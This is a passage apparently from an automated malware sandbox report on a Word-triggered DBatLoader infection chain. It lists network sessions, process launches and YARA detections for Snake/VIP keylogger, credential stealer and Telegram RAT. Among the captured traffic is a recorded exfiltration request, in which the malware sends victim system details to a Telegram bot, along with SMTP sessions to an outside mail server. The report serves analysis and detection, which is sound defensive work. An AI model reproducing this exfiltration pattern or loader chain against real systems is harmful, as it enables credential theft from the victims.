2025-01-06 06:53:56 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49814 | 188.114.97.3 | 443 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:57 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:58 UTC | 864 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:58 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461227
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AOPQFHg%2FatYa5mBT64yezQYtdiCrSBQdQUJWwQyj0ftk1puT6rtXfrxGmjr4vbGI4bgszkdNJ%2FaWI7g1PSt4LDrXJUhjI4YLRY%2FZzUjovcI4eUA%2BqMnXSi1%2BT9%2B6qzXp3sG8%2B%2F8N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb45eabe433a-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1683&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1676234&cwnd=32&unsent_bytes=0&cid=aa69b79b1f96e6fc&ts=161&x=0"
2025-01-06 06:53:58 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49816 | 188.114.97.3 | 443 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:59 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:59 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:59 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461228
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yWNrGirkq6Ec8UZmgtIe%2FV5uFZWFHG2W5WOhprbxGPayRCUlgcdG%2FRIYfSbNOvyQYhqiiQuupuywBMIlGUEgBtHsbi9UUG0nm74iuDMzU6h%2F%2BAv%2F9wKPyTz9wJPvC6gw11tusVZx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb4d79768c12-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1860&min_rtt=1858&rtt_var=701&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1555673&cwnd=177&unsent_bytes=0&cid=035c7dfeee7419b1&ts=146&x=0"
2025-01-06 06:53:59 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49818 | 149.154.167.220 | 443 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:00 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2018:43:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:54:00 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:54:00 GMT
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-06 06:54:00 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 6, 2025 07:53:49.856524944 CET | 587 | 49796 | 46.151.208.21 | 192.168.2.4 | 220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:53:52 +0300
Jan 6, 2025 07:53:49.857033014 CET | 49796 | 587 | 192.168.2.4 | 46.151.208.21 | EHLO 536720
Jan 6, 2025 07:53:50.139569998 CET | 587 | 49796 | 46.151.208.21 | 192.168.2.4 | 250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
Jan 6, 2025 07:53:50.256346941 CET | 49796 | 587 | 192.168.2.4 | 46.151.208.21 | STARTTLS
Jan 6, 2025 07:53:50.523679972 CET | 587 | 49796 | 46.151.208.21 | 192.168.2.4 | 220 TLS go ahead
Jan 6, 2025 07:53:56.804439068 CET | 587 | 49809 | 46.151.208.21 | 192.168.2.4 | 220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:53:59 +0300
Jan 6, 2025 07:53:56.804683924 CET | 49809 | 587 | 192.168.2.4 | 46.151.208.21 | EHLO 536720
Jan 6, 2025 07:53:57.093535900 CET | 587 | 49809 | 46.151.208.21 | 192.168.2.4 | 250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
Jan 6, 2025 07:53:57.096580982 CET | 49809 | 587 | 192.168.2.4 | 46.151.208.21 | STARTTLS
Jan 6, 2025 07:53:57.367635965 CET | 587 | 49809 | 46.151.208.21 | 192.168.2.4 | 220 TLS go ahead
Jan 6, 2025 07:54:00.223993063 CET | 587 | 49817 | 46.151.208.21 | 192.168.2.4 | 220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:54:03 +0300
Jan 6, 2025 07:54:00.224208117 CET | 49817 | 587 | 192.168.2.4 | 46.151.208.21 | EHLO 536720
Jan 6, 2025 07:54:00.506345987 CET | 587 | 49817 | 46.151.208.21 | 192.168.2.4 | 250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
Jan 6, 2025 07:54:00.506644011 CET | 49817 | 587 | 192.168.2.4 | 46.151.208.21 | STARTTLS
Jan 6, 2025 07:54:00.772526026 CET | 587 | 49817 | 46.151.208.21 | 192.168.2.4 | 220 TLS go ahead
Jan 6, 2025 07:54:06.459235907 CET | 587 | 49845 | 46.151.208.21 | 192.168.2.4 | 220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:54:09 +0300
Jan 6, 2025 07:54:06.459461927 CET | 49845 | 587 | 192.168.2.4 | 46.151.208.21 | EHLO 536720
Jan 6, 2025 07:54:06.743177891 CET | 587 | 49845 | 46.151.208.21 | 192.168.2.4 | 250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
Jan 6, 2025 07:54:06.743597031 CET | 49845 | 587 | 192.168.2.4 | 46.151.208.21 | STARTTLS
Jan 6, 2025 07:54:07.031544924 CET | 587 | 49845 | 46.151.208.21 | 192.168.2.4 | 220 TLS go ahead
Jan 6, 2025 07:54:07.671569109 CET | 587 | 49855 | 46.151.208.21 | 192.168.2.4 | 220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:54:10 +0300
Jan 6, 2025 07:54:07.672250032 CET | 49855 | 587 | 192.168.2.4 | 46.151.208.21 | EHLO 536720
Jan 6, 2025 07:54:07.956434965 CET | 587 | 49855 | 46.151.208.21 | 192.168.2.4 | 250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
Jan 6, 2025 07:54:07.956732035 CET | 49855 | 587 | 192.168.2.4 | 46.151.208.21 | STARTTLS
Jan 6, 2025 07:54:08.224337101 CET | 587 | 49855 | 46.151.208.21 | 192.168.2.4 | 220 TLS go ahead
Jan 6, 2025 07:54:13.893156052 CET | 587 | 49892 | 46.151.208.21 | 192.168.2.4 | 220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:54:16 +0300
Jan 6, 2025 07:54:13.893332005 CET | 49892 | 587 | 192.168.2.4 | 46.151.208.21 | EHLO 536720
Jan 6, 2025 07:54:14.178177118 CET | 587 | 49892 | 46.151.208.21 | 192.168.2.4 | 250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
Jan 6, 2025 07:54:14.178481102 CET | 49892 | 587 | 192.168.2.4 | 46.151.208.21 | STARTTLS
Jan 6, 2025 07:54:14.969419956 CET | 587 | 49892 | 46.151.208.21 | 192.168.2.4 | 220 TLS go ahead


                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:01:53:05
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                        File size:1'620'872 bytes
                                                                                                                                                                        MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:01:53:15
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:1'161'216 bytes
                                                                                                                                                                        MD5 hash:BF9B75ADF866583299DBC8A5FAD66CFC
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.1900364042.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.1854703375.0000000002276000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:6
                                                                                                                                                                        Start time:01:53:19
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:01:53:19
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:01:53:20
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:175'800 bytes
                                                                                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.3076785533.0000000028C89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.3047680567.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 3%, ReversingLabs
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:01:53:30
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Users\Public\Libraries\Nsltarpn.PIF
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Nsltarpn.PIF"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:1'161'216 bytes
                                                                                                                                                                        MD5 hash:BF9B75ADF866583299DBC8A5FAD66CFC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:12
                                                                                                                                                                        Start time:01:53:31
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:13
                                                                                                                                                                        Start time:01:53:31
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:14
                                                                                                                                                                        Start time:01:53:31
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:175'800 bytes
                                                                                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000002.3047709158.0000000000BE0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3083897007.000000003438B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000001.1967244493.0000000000BE0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
